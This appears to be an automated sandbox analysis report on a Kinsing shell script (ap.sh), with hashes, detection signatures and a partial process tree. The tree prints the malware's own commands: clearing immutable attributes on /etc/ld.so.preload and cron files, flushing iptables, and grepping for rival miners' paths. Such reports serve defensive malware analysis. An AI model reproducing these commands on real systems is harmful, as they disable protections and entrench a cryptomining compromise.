Analysis
-
max time kernel
127s -
max time network
89s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240729-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240729-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
23/02/2025, 18:48
Static task
static1
Behavioral task
behavioral1
Sample
ap.sh
Resource
ubuntu1804-amd64-20240508-en
Behavioral task
behavioral2
Sample
ap.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
ap.sh
Resource
debian9-mipsbe-20240729-en
Behavioral task
behavioral4
Sample
ap.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
ap.sh
-
Size
15KB
-
MD5
34ac9486a95651a465a5fc6039c2819a
-
SHA1
274290fc9187e8f3504aec78ea1ef8984b5099d3
-
SHA256
7f65f1d3cc38298c0b27c6f307b51a578619a16f12d3e8c662c3b7e290d08ebe
-
SHA512
9c886b2976fc624ada4d5ed34f662a7aff682bae4bb4f37a519d50bd94ef019924a96aeb4b84fbee3136114e4f8d6ce5626d40b123622f3ceeb06de9969b9409
-
SSDEEP
384:r5JxgzLuqlH2wx2vUaQa5/eN86704s80ooJQYgykWT4yCtvUsDjdWOoJwN:trgXux7YJDj8OoJwN
Malware Config
Signatures
-
Kinsing Rootkit
Rootkit reuses the publicly available BEURK rootkit.
-
Kinsing Rootkit payload 1 IoCs
resource yara_rule behavioral3/files/fstream-17.dat family_elf_kinsing_rootkit -
Kinsing family
-
Kinsing payload 1 IoCs
resource yara_rule behavioral3/files/fstream-16.dat family_elf_kinsing_loader -
Kinsing_rootkit family
-
Modifies the dynamic linker configuration file 2 TTPs 1 IoCs
Malware can modify the configuration file of the dynamic linker to preload malicous libraries with every executed process.
description ioc Process File opened for modification /etc/ld.so.preload ap.sh -
File and Directory Permissions Modification 1 TTPs 8 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 1712 chmod 1714 chmod 1719 chmod 1721 chmod 1727 chmod 1728 chmod 1701 chmod 1703 chmod -
Executes dropped EXE 1 IoCs
ioc pid Process /etc/data/kinsing 1729 ap.sh -
Flushes firewall rules 1 TTPs 1 IoCs
Flushes/ disables firewall rules inside the Linux kernel.
pid Process 730 iptables -
Abuse Elevation Control Mechanism: Sudo and Sudo Caching 1 TTPs 1 IoCs
Abuse sudo or cached sudo credentials to execute code.
pid Process 1449 sudo -
Attempts to change immutable files 50 IoCs
Modifies inode attributes on the filesystem to allow changing of immutable files.
pid Process 1540 xargs 1553 xargs 1631 sed 1634 sed 1651 xargs 1513 xargs 1603 xargs 1607 sed 1618 xargs 1656 xargs 1668 xargs 1690 xargs 724 chattr 1503 xargs 1535 xargs 1604 sed 1612 xargs 1637 sed 717 chattr 727 chattr 1613 sed 1458 uname 1559 xargs 1610 sed 1616 sed 1639 xargs 1695 xargs 1492 xargs 1508 xargs 1565 xargs 1571 xargs 1627 xargs 1679 xargs 1523 xargs 1609 xargs 1619 sed 1621 xargs 1628 sed 1633 xargs 1482 xargs 1497 xargs 1547 xargs 1606 xargs 1615 xargs 1625 sed 1630 xargs 1636 xargs 1487 xargs 1518 xargs 1528 xargs -
Creates/modifies Cron job 1 TTPs 64 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
description ioc Process File opened for modification /var/spool/cron/crontabs/tmp.rIpAkD crontab File opened for modification /var/spool/cron/crontabs/tmp.avodIw crontab File opened for modification /var/spool/cron/crontabs/tmp.qmbiMS crontab File opened for modification /var/spool/cron/crontabs/tmp.3Pv95H crontab File opened for modification /var/spool/cron/crontabs/tmp.Mtlr4V crontab File opened for modification /var/spool/cron/crontabs/tmp.VhIkec crontab File opened for modification /var/spool/cron/crontabs/tmp.SLEJrh crontab File opened for modification /var/spool/cron/crontabs/tmp.5qXXRc crontab File opened for modification /var/spool/cron/crontabs/tmp.8QOsYO crontab File opened for modification /var/spool/cron/crontabs/tmp.mjheG5 crontab File opened for modification /var/spool/cron/crontabs/tmp.0FZGvp crontab File opened for modification /var/spool/cron/crontabs/tmp.pZPjUV crontab File opened for modification /var/spool/cron/crontabs/tmp.Vq1nzg crontab File opened for modification /var/spool/cron/crontabs/tmp.NInW2W crontab File opened for modification /var/spool/cron/crontabs/tmp.SMO7e7 crontab File opened for modification /var/spool/cron/crontabs/tmp.aROQSI crontab File opened for modification /var/spool/cron/crontabs/tmp.hl8q8h crontab File opened for modification /var/spool/cron/crontabs/tmp.mD6gis crontab File opened for modification /var/spool/cron/crontabs/tmp.ZmE5a4 crontab File opened for modification /var/spool/cron/crontabs/tmp.MOqjrW crontab File opened for modification /var/spool/cron/crontabs/tmp.oROEjj crontab File opened for modification /var/spool/cron/crontabs/tmp.pUnp4x crontab File opened for modification /var/spool/cron/crontabs/tmp.kvfvde crontab File opened for modification /var/spool/cron/crontabs/tmp.j1hpqb crontab File opened for modification /var/spool/cron/crontabs/tmp.AIWOtP crontab File opened for modification /var/spool/cron/crontabs/tmp.PMF0y2 crontab File opened for modification /var/spool/cron/crontabs/tmp.3y8vkX crontab File opened for modification /var/spool/cron/crontabs/tmp.xQ87Cc crontab File opened for modification /var/spool/cron/crontabs/tmp.E400HJ crontab File opened for modification /var/spool/cron/crontabs/tmp.hTHeie crontab File opened for modification /var/spool/cron/crontabs/tmp.5fCZUJ crontab File opened for modification /var/spool/cron/crontabs/tmp.p7x3Wt crontab File opened for modification /var/spool/cron/crontabs/tmp.r4re3n crontab File opened for modification /var/spool/cron/crontabs/tmp.J69bBg crontab File opened for modification /var/spool/cron/crontabs/tmp.7xgZbB crontab File opened for modification /var/spool/cron/crontabs/tmp.WiOSep crontab File opened for modification /var/spool/cron/crontabs/tmp.6lVss9 crontab File opened for modification /var/spool/cron/crontabs/tmp.PpuKtf crontab File opened for modification /var/spool/cron/crontabs/tmp.yZ8kFm crontab File opened for modification /var/spool/cron/crontabs/tmp.VSfTwO crontab File opened for modification /var/spool/cron/crontabs/tmp.YpsjYc crontab File opened for modification /var/spool/cron/crontabs/tmp.egOJNt crontab File opened for modification /var/spool/cron/crontabs/tmp.lt4row crontab File opened for modification /var/spool/cron/crontabs/tmp.6PvkEj crontab File opened for modification /var/spool/cron/crontabs/tmp.UizaNI crontab File opened for modification /var/spool/cron/crontabs/tmp.RGP6dI crontab File opened for modification /var/spool/cron/crontabs/tmp.KsJTqP crontab File opened for modification /var/spool/cron/crontabs/tmp.jrfUem crontab File opened for modification /var/spool/cron/crontabs/tmp.hy8N0V crontab File opened for modification /var/spool/cron/crontabs/tmp.Ub4lxE crontab File opened for modification /var/spool/cron/crontabs/tmp.8A4YFW crontab File opened for modification /var/spool/cron/crontabs/tmp.ibiywR crontab File opened for modification /var/spool/cron/crontabs/tmp.HL6A83 crontab File opened for modification /var/spool/cron/crontabs/tmp.9MFW32 crontab File opened for modification /var/spool/cron/crontabs/tmp.0XI4ws crontab File opened for modification /var/spool/cron/crontabs/tmp.Ag1nW6 crontab File opened for modification /var/spool/cron/crontabs/tmp.cVy9Zf crontab File opened for modification /var/spool/cron/crontabs/tmp.Hu1mtW crontab File opened for modification /var/spool/cron/crontabs/tmp.oQsL6u crontab File opened for modification /var/spool/cron/crontabs/tmp.iUd14P crontab File opened for modification /var/spool/cron/crontabs/tmp.bCHcW8 crontab File opened for modification /var/spool/cron/crontabs/tmp.oqmGFk crontab File opened for modification /var/spool/cron/crontabs/tmp.aAOMAV crontab File opened for modification /var/spool/cron/crontabs/tmp.thi2MW crontab -
Enumerates running processes
Discovers information about currently running processes on the system
-
Modifies systemd 2 TTPs 1 IoCs
Adds/ modifies systemd service files. Likely to achieve persistence.
description ioc Process File opened for modification /lib/systemd/system/bot.service ap.sh -
Reads CPU attributes 1 TTPs 64 IoCs
description ioc Process File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online exim4 File opened for reading /sys/devices/system/cpu/online exim4 File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps -
Enumerates kernel/hardware configuration 1 TTPs 2 IoCs
Reads contents of /sys virtual filesystem to enumerate system information.
description ioc Process File opened for reading /sys/fs/kdbus/0-system/bus systemctl File opened for reading /sys/fs/kdbus/0-system/bus systemctl -
Process Discovery 1 TTPs 12 IoCs
Adversaries may try to discover information about running processes.
pid Process 1531 ps 1536 ps 1599 ps 1652 ps 1691 ps 1504 ps 1509 ps 1514 ps 1647 ps 1499 ps 1519 ps 1524 ps -
description ioc Process File opened for reading /proc/10/cmdline pkill File opened for reading /proc/74/stat ps File opened for reading /proc/76/cmdline ps File opened for reading /proc/73/stat ps File opened for reading /proc/354/cmdline pkill File opened for reading /proc/83/status pkill File opened for reading /proc/678/status pkill File opened for reading /proc/77/status pkill File opened for reading /proc/12/cmdline ps File opened for reading /proc/712/status ps File opened for reading /proc/155/cmdline ps File opened for reading /proc/714/status pkill File opened for reading /proc/176/status ps File opened for reading /proc/filesystems ls File opened for reading /proc/6/status pkill File opened for reading /proc/6/status pkill File opened for reading /proc/10/cmdline ps File opened for reading /proc/23/cmdline pkill File opened for reading /proc/354/cmdline pkill File opened for reading /proc/18/stat ps File opened for reading /proc/155/cmdline ps File opened for reading /proc/353/cmdline pkill File opened for reading /proc/713/cmdline pkill File opened for reading /proc/357/status ps File opened for reading /proc/354/status ps File opened for reading /proc/77/stat ps File opened for reading /proc/sys/kernel/ngroups_max sendmail File opened for reading /proc/379/cmdline pkill File opened for reading /proc/712/cmdline ps File opened for reading /proc/679/stat ps File opened for reading /proc/8/status pkill File opened for reading /proc/13/cmdline pkill File opened for reading /proc/5/status pkill File opened for reading /proc/1/cmdline ps File opened for reading /proc/8/status pkill File opened for reading /proc/161/cmdline pkill File opened for reading /proc/70/cmdline pkill File opened for reading /proc/434/status pkill File opened for reading /proc/357/status pkill File opened for reading /proc/713/cmdline pkill File opened for reading /proc/11/cmdline ps File opened for reading /proc/filesystems crontab File opened for reading /proc/5/cmdline ps File opened for reading /proc/12/cmdline ps File opened for reading /proc/176/cmdline pkill File opened for reading /proc/693/status pkill File opened for reading /proc/72/cmdline ps File opened for reading /proc/161/status pkill File opened for reading /proc/83/status pkill File opened for reading /proc/75/status ps File opened for reading /proc/6/cmdline ps File opened for reading /proc/357/stat ps File opened for reading /proc/81/cmdline pkill File opened for reading /proc/73/cmdline pkill File opened for reading /proc/72/status pkill File opened for reading /proc/327/cmdline pkill File opened for reading /proc/354/cmdline pkill File opened for reading /proc/122/status ps File opened for reading /proc/4/cmdline ps File opened for reading /proc/155/stat ps File opened for reading /proc/24/cmdline ps File opened for reading /proc/73/status pkill File opened for reading /proc/12/status pkill File opened for reading /proc/filesystems pkill -
System Network Configuration Discovery 1 TTPs 2 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 1404 ls 1834 sed
Processes
-
/tmp/ap.sh/tmp/ap.sh1⤵
- Modifies the dynamic linker configuration file
- Executes dropped EXE
- Modifies systemd
PID:715 -
/usr/bin/chattrchattr -i /etc/ld.so.preload2⤵
- Attempts to change immutable files
PID:717
-
-
/bin/rmrm -f /etc/ld.so.preload2⤵PID:723
-
-
/usr/bin/chattrchattr -R -ia /var/spool/cron2⤵
- Attempts to change immutable files
PID:724
-
-
/usr/bin/chattrchattr -ia /etc/crontab2⤵
- Attempts to change immutable files
PID:727
-
-
/sbin/iptablesiptables -F2⤵
- Flushes firewall rules
PID:730
-
-
/bin/grepgrep exe2⤵PID:739
-
-
/bin/lsls -latrh /proc/12⤵PID:738
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:744
-
-
/bin/lsls -latrh /proc/102⤵PID:748
-
-
/bin/grepgrep exe2⤵PID:749
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:752
-
-
/bin/grepgrep exe2⤵PID:755
-
-
/bin/lsls -latrh /proc/112⤵PID:754
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:759
-
-
/bin/grepgrep exe2⤵PID:762
-
-
/bin/lsls -latrh /proc/1112⤵PID:761
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:765
-
-
/bin/lsls -latrh /proc/122⤵PID:768
-
-
/bin/grepgrep exe2⤵PID:769
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:772
-
-
/bin/grepgrep exe2⤵PID:775
-
-
/bin/lsls -latrh /proc/1212⤵PID:774
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:778
-
-
/bin/grepgrep exe2⤵PID:781
-
-
/bin/lsls -latrh /proc/1222⤵PID:780
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:783
-
-
/bin/grepgrep exe2⤵PID:787
-
-
/bin/lsls -latrh /proc/132⤵PID:786
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:789
-
-
/bin/lsls -latrh /proc/142⤵PID:791
-
-
/bin/grepgrep exe2⤵PID:792
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:794
-
-
/bin/lsls -latrh /proc/152⤵PID:796
-
-
/bin/grepgrep exe2⤵PID:797
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:799
-
-
/bin/grepgrep exe2⤵PID:802
-
-
/bin/lsls -latrh /proc/1552⤵PID:801
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:804
-
-
/bin/grepgrep exe2⤵PID:807
-
-
/bin/lsls -latrh /proc/162⤵PID:806
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:809
-
-
/bin/grepgrep exe2⤵PID:812
-
-
/bin/lsls -latrh /proc/1612⤵PID:811
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:814
-
-
/bin/grepgrep exe2⤵PID:817
-
-
/bin/lsls -latrh /proc/172⤵PID:816
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:819
-
-
/bin/lsls -latrh /proc/1762⤵PID:821
-
-
/bin/grepgrep exe2⤵PID:822
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:824
-
-
/bin/grepgrep exe2⤵PID:827
-
-
/bin/lsls -latrh /proc/182⤵PID:826
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:829
-
-
/bin/grepgrep exe2⤵PID:832
-
-
/bin/lsls -latrh /proc/192⤵PID:831
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:834
-
-
/bin/grepgrep exe2⤵PID:837
-
-
/bin/lsls -latrh /proc/22⤵PID:836
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:839
-
-
/bin/lsls -latrh /proc/202⤵PID:841
-
-
/bin/grepgrep exe2⤵PID:842
-
-
